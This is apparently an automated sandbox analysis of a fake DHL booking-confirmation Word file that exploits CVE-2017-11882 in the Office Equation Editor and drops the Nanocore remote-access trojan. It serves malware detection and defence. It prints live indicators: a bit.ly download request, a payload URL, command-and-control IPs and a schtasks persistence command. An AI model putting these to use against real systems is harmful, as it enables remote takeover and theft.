Play interactive tour

Edit tour

Analysis Report DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909yy.doc

Overview

General Information

Sample Name:	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909yy.doc
Analysis ID:	357311
MD5:	f89f2bb301dfc15a5c610356985cd85c
SHA1:	add01248aa7c1ec894e05398d1a46721fa3da986
SHA256:	072e26aacdd14b3210884f383ea0fa6705fc2f37661f8fb651d75dbf355b70aa
Tags:	DHLdoc
Infos:
Most interesting Screenshot:

Detection

Nanocore

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected Nanocore Rat

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Sigma detected: Scheduled temp file as task from temp location

Yara detected Nanocore RAT

.NET source code contains potential unpacker

Connects to a URL shortener service

Drops PE files to the user root directory

Machine Learning detection for dropped file

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Sigma detected: Executables Started in Suspicious Folder

Sigma detected: Execution in Non-Executable Folder

Sigma detected: Suspicious Program Location Process Starts

Uses schtasks.exe or at.exe to add and modify task schedules

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Drops PE files to the user directory

Drops certificate files (DER)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w7x64

WINWORD.EXE (PID: 2264 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)

EQNEDT32.EXE (PID: 1324 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

69577.exe (PID: 2320 cmdline: C:\Users\Public\69577.exe MD5: 8C596990203F7D15651498FDBA84B5F3)

schtasks.exe (PID: 824 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\xWdTBYiTWyTud' /XML 'C:\Users\user\AppData\Local\Temp\tmpA738.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)

69577.exe (PID: 2900 cmdline: {path} MD5: 8C596990203F7D15651498FDBA84B5F3)

69577.exe (PID: 2500 cmdline: {path} MD5: 8C596990203F7D15651498FDBA84B5F3)

69577.exe (PID: 2480 cmdline: {path} MD5: 8C596990203F7D15651498FDBA84B5F3)

69577.exe (PID: 2468 cmdline: {path} MD5: 8C596990203F7D15651498FDBA84B5F3)

69577.exe (PID: 2464 cmdline: {path} MD5: 8C596990203F7D15651498FDBA84B5F3)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.2117450780.0000000003259000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x26fa7d:$x1: NanoCore.ClientPluginHost 0x26faba:$x2: IClientNetworkHost 0x2735ed:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000004.00000002.2117450780.0000000003259000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000004.00000002.2117450780.0000000003259000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x26f7e5:$a: NanoCore 0x26f7f5:$a: NanoCore 0x26fa29:$a: NanoCore 0x26fa3d:$a: NanoCore 0x26fa7d:$a: NanoCore 0x26f844:$b: ClientPlugin 0x26fa46:$b: ClientPlugin 0x26fa86:$b: ClientPlugin 0x1bbeea:$c: ProjectData 0x26f96b:$c: ProjectData 0x270372:$d: DESCrypto 0x277d3e:$e: KeepAlive 0x275d2c:$g: LogClientMessage 0x271f27:$i: get_Connected 0x2706a8:$j: #=q 0x2706d8:$j: #=q 0x2706f4:$j: #=q 0x270724:$j: #=q 0x270740:$j: #=q 0x27075c:$j: #=q 0x27078c:$j: #=q
Process Memory Space: 69577.exe PID: 2320	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x6046db:$x1: NanoCore.ClientPluginHost 0x60473c:$x2: IClientNetworkHost 0x609b41:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x617ab3:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: 69577.exe PID: 2320	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: 69577.exe PID: 2320	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x6041e0:$a: NanoCore 0x6041fc:$a: NanoCore 0x604357:$a: NanoCore 0x604366:$a: NanoCore 0x60463f:$a: NanoCore 0x60466b:$a: NanoCore 0x6046db:$a: NanoCore 0x61411d:$a: NanoCore 0x61412f:$a: NanoCore 0x61416b:$a: NanoCore 0x604287:$b: ClientPlugin 0x6043b0:$b: ClientPlugin 0x604674:$b: ClientPlugin 0x6046e4:$b: ClientPlugin 0x614138:$b: ClientPlugin 0x614174:$b: ClientPlugin 0x5a803e:$c: ProjectData 0x5a9c3e:$c: ProjectData 0x5f8494:$c: ProjectData 0x5fa094:$c: ProjectData 0x6044fd:$c: ProjectData
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.69577.exe.34b88f0.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.2.69577.exe.34b88f0.4.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.2.69577.exe.34b88f0.4.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
4.2.69577.exe.34b88f0.4.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.2.69577.exe.34b88f0.4.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
4.2.69577.exe.34b88f0.4.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.2.69577.exe.34b88f0.4.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
4.2.69577.exe.33a0240.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x12883d:$x1: NanoCore.ClientPluginHost 0x12887a:$x2: IClientNetworkHost 0x12c3ad:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.2.69577.exe.33a0240.3.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.2.69577.exe.33a0240.3.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x1285a5:$a: NanoCore 0x1285b5:$a: NanoCore 0x1287e9:$a: NanoCore 0x1287fd:$a: NanoCore 0x12883d:$a: NanoCore 0x128604:$b: ClientPlugin 0x128806:$b: ClientPlugin 0x128846:$b: ClientPlugin 0x74caa:$c: ProjectData 0x12872b:$c: ProjectData 0x129132:$d: DESCrypto 0x130afe:$e: KeepAlive 0x12eaec:$g: LogClientMessage 0x12ace7:$i: get_Connected 0x129468:$j: #=q 0x129498:$j: #=q 0x1294b4:$j: #=q 0x1294e4:$j: #=q 0x129500:$j: #=q 0x12951c:$j: #=q 0x12954c:$j: #=q
Click to see the 5 entries

Sigma Overview

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Users\Public\69577.exe, CommandLine: C:\Users\Public\69577.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\69577.exe, NewProcessName: C:\Users\Public\69577.exe, OriginalFileName: C:\Users\Public\69577.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1324, ProcessCommandLine: C:\Users\Public\69577.exe, ProcessId: 2320

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 67.199.248.11, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1324, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1324, TargetFilename: C:\Users\Public\69577.exe

Sigma detected: Scheduled temp file as task from temp location

Show sources

Source: Process started

Author: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\xWdTBYiTWyTud' /XML 'C:\Users\user\AppData\Local\Temp\tmpA738.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\xWdTBYiTWyTud' /XML 'C:\Users\user\AppData\Local\Temp\tmpA738.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\Public\69577.exe, ParentImage: C:\Users\Public\69577.exe, ParentProcessId: 2320, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\xWdTBYiTWyTud' /XML 'C:\Users\user\AppData\Local\Temp\tmpA738.tmp', ProcessId: 824

Sigma detected: Executables Started in Suspicious Folder

Show sources

Source: Process started

Sigma detected: Execution in Non-Executable Folder

Show sources

Source: Process started

Sigma detected: Suspicious Program Location Process Starts

Show sources

Source: Process started

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909yy.doc

ReversingLabs: Detection: 27%

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000004.00000002.2117450780.0000000003259000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 69577.exe PID: 2320, type: MEMORY
Source: Yara match	File source: 4.2.69577.exe.34b88f0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.69577.exe.34b88f0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.69577.exe.33a0240.3.raw.unpack, type: UNPACKEDPE

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\xWdTBYiTWyTud.exe	Joe Sandbox ML: detected
Source: C:\Users\Public\69577.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\HOMqO[1].txt	Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\69577.exe

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Compliance:

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Software Vulnerabilities:

Source: global traffic

DNS query: name: bit.ly

Source: global traffic

TCP traffic: 192.168.2.22:49166 -> 5.79.72.163:443

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 67.199.248.11:80

Networking:

Connects to a URL shortener service

Show sources

Source: unknown

DNS query: name: bit.ly

Source: Joe Sandbox View

IP Address: 67.199.248.11 67.199.248.11

Source: global traffic

HTTP traffic detected: GET /3kijui1 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: bit.lyConnection: Keep-Alive

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B5F6BABB-61BE-41BF-89DB-AF92964D1C77}.tmp

Jump to behavior

Source: global traffic

Source: unknown

DNS traffic detected: queries for: bit.ly

Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.2.dr	String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: 77EC63BDA74BD0D0E0426DC8F8008506.2.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: 69577.exe, 00000004.00000002.2120004979.00000000056C0000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: 69577.exe, 00000004.00000002.2116349948.0000000002251000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 69577.exe, 00000004.00000002.2120004979.00000000056C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: 3kijui1[1].htm.2.dr	String found in binary or memory: https://u.teknik.io/HOMqO.txt

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown	Network traffic detected: HTTP traffic on port 49166 -> 443

E-Banking Fraud:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000004.00000002.2117450780.0000000003259000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 69577.exe PID: 2320, type: MEMORY
Source: Yara match	File source: 4.2.69577.exe.34b88f0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.69577.exe.34b88f0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.69577.exe.33a0240.3.raw.unpack, type: UNPACKEDPE

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A

Jump to dropped file

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000004.00000002.2117450780.0000000003259000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000004.00000002.2117450780.0000000003259000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: 69577.exe PID: 2320, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: 69577.exe PID: 2320, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.69577.exe.34b88f0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.69577.exe.34b88f0.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.69577.exe.34b88f0.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.69577.exe.34b88f0.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.69577.exe.33a0240.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.69577.exe.33a0240.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\69577.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\HOMqO[1].txt			Jump to dropped file

Source: C:\Users\Public\69577.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\69577.exe	Memory allocated: 76D20000 page execute and read and write

Source: C:\Users\Public\69577.exe	Code function: 4_2_001E2A00
Source: C:\Users\Public\69577.exe	Code function: 4_2_001E9CD0
Source: C:\Users\Public\69577.exe	Code function: 4_2_001E3941
Source: C:\Users\Public\69577.exe	Code function: 4_2_001E9B4A
Source: C:\Users\Public\69577.exe	Code function: 4_2_001E568D
Source: C:\Users\Public\69577.exe	Code function: 4_2_001E3700
Source: C:\Users\Public\69577.exe	Code function: 4_2_004F2FE0
Source: C:\Users\Public\69577.exe	Code function: 4_2_003E66F2
Source: C:\Users\Public\69577.exe	Code function: 4_2_001E00A4
Source: C:\Users\Public\69577.exe	Code function: 4_2_001E04E0
Source: C:\Users\Public\69577.exe	Code function: 7_2_003E66F2

Source: 00000004.00000002.2117450780.0000000003259000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000004.00000002.2117450780.0000000003259000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: 69577.exe PID: 2320, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: 69577.exe PID: 2320, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 4.2.69577.exe.34b88f0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.69577.exe.34b88f0.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 4.2.69577.exe.34b88f0.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.69577.exe.34b88f0.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.69577.exe.34b88f0.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 4.2.69577.exe.33a0240.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.69577.exe.33a0240.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore

Source: xWdTBYiTWyTud.exe.4.dr

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.expl.evad.winDOC@16/20@2/2

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$L88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909yy.doc

Jump to behavior

Source: C:\Users\Public\69577.exe

Mutant created: \Sessions\1\BaseNamedObjects\gztXuihPvFgNHOAEWZySf

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRB7CA.tmp

Jump to behavior

Source: C:\Windows\SysWOW64\schtasks.exe

Console Write: ................P.......................(.P.....`.......8...............Pt......................................................................

Source: C:\Users\Public\69577.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909yy.doc

ReversingLabs: Detection: 27%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe
Source: unknown	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\xWdTBYiTWyTud' /XML 'C:\Users\user\AppData\Local\Temp\tmpA738.tmp'
Source: unknown	Process created: C:\Users\Public\69577.exe {path}
Source: unknown	Process created: C:\Users\Public\69577.exe {path}
Source: unknown	Process created: C:\Users\Public\69577.exe {path}
Source: unknown	Process created: C:\Users\Public\69577.exe {path}
Source: unknown	Process created: C:\Users\Public\69577.exe {path}
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe
Source: C:\Users\Public\69577.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\xWdTBYiTWyTud' /XML 'C:\Users\user\AppData\Local\Temp\tmpA738.tmp'
Source: C:\Users\Public\69577.exe	Process created: C:\Users\Public\69577.exe {path}
Source: C:\Users\Public\69577.exe	Process created: C:\Users\Public\69577.exe {path}
Source: C:\Users\Public\69577.exe	Process created: C:\Users\Public\69577.exe {path}
Source: C:\Users\Public\69577.exe	Process created: C:\Users\Public\69577.exe {path}
Source: C:\Users\Public\69577.exe	Process created: C:\Users\Public\69577.exe {path}

Source: C:\Users\Public\69577.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\Public\69577.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Source: DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909yy.doc

Static file information: File size 1380809 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: xWdTBYiTWyTud.exe.4.dr, Login.cs	.Net Code: set_Name System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.2.69577.exe.3e0000.0.unpack, Login.cs	.Net Code: set_Name System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.69577.exe.3e0000.0.unpack, Login.cs	.Net Code: set_Name System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.69577.exe.3e0000.0.unpack, Login.cs	.Net Code: set_Name System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.2.69577.exe.3e0000.0.unpack, Login.cs	.Net Code: set_Name System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.2.69577.exe.3e0000.0.unpack, Login.cs	.Net Code: set_Name System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.0.69577.exe.3e0000.0.unpack, Login.cs	.Net Code: set_Name System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 9.2.69577.exe.3e0000.0.unpack, Login.cs	.Net Code: set_Name System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
